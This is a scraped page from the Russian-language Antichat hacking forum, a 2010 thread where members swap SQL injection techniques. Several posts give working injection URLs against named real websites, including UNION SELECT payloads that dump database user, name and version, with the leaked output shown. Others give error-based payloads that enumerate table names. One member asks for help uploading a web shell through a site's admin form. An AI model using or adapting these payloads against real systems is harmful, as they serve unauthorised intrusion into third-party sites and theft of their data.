ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11901  
Старый 11.03.2010, 00:16
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

посмотри последний вопрос по скуле и еще страниц 5 назад *извращенцы*
 
Ответить с цитированием

  #11902  
Старый 11.03.2010, 01:14
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от wildshaman  
А что актуально, магистр?

Он про "новый" способ
Что-то типа такого.

Цитата:
script.php?id=(select+1+from+(select+count(0),conc at((select+version()+from+information_schema.table s+limit+1), floor(rand(0)*2))+from+information_schema.tables+g roup+by+2+limit+1)a)

извращение еще то.
 
Ответить с цитированием

  #11903  
Старый 11.03.2010, 01:34
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от mailbrush  
YuNi|[c, а зачем его в hex переводить, да еще и cast юзать, и переносы строки (%0a) вместо обычных пробелов?

CyberHunter, юзай:
Код:
http://www.spbpost.ru/index.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex(hex(concat_ws(0x3a,user(),database(),version()))),11,12,13,14,15,16,17
Код:
spbpost@localhost:spbpost_db:5.1.42-log
ну не стреляй в пианиста, он играет как можеть ))

Если накодиш для автоматизации сорец вот тогда пригодится мой вариант
 
Ответить с цитированием

  #11904  
Старый 11.03.2010, 01:39
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

ну так, как я понимаю, это дело работает когда есть вывод ошибки?
 
Ответить с цитированием

  #11905  
Старый 11.03.2010, 01:46
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от Pashkela  
пора бы уже начать понимать, что union и вообще подбор кол-ва колонок и выявление принтабельных уже просто неакутальны
и не говори; новый век вообще внес кардинальные изменения в хек-основы знаний нашего поколения: фтп стал быстрее зипа, например
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #11906  
Старый 11.03.2010, 01:53
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

фтп всегда был круче )
 
Ответить с цитированием

  #11907  
Старый 11.03.2010, 07:39
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от l1ght  
http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'
Не очень то получается с лимитом для вывода поочередно имена таблиц ((
 
Ответить с цитированием

  #11908  
Старый 11.03.2010, 15:38
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/0,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/1,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/2,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/2,1)a)*'
 
Ответить с цитированием

  #11909  
Старый 11.03.2010, 17:29
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет
 
Ответить с цитированием

  #11910  
Старый 11.03.2010, 17:40
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
http://www.nwec.ru/index.php?issue_id=57
Мучаюсь,мучаюсь, решил спросить, можно ли что сделать с этим сайтиком, id повсюду, фильтрация ничего не дает сделать..( Помогите.
Вот смотри:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ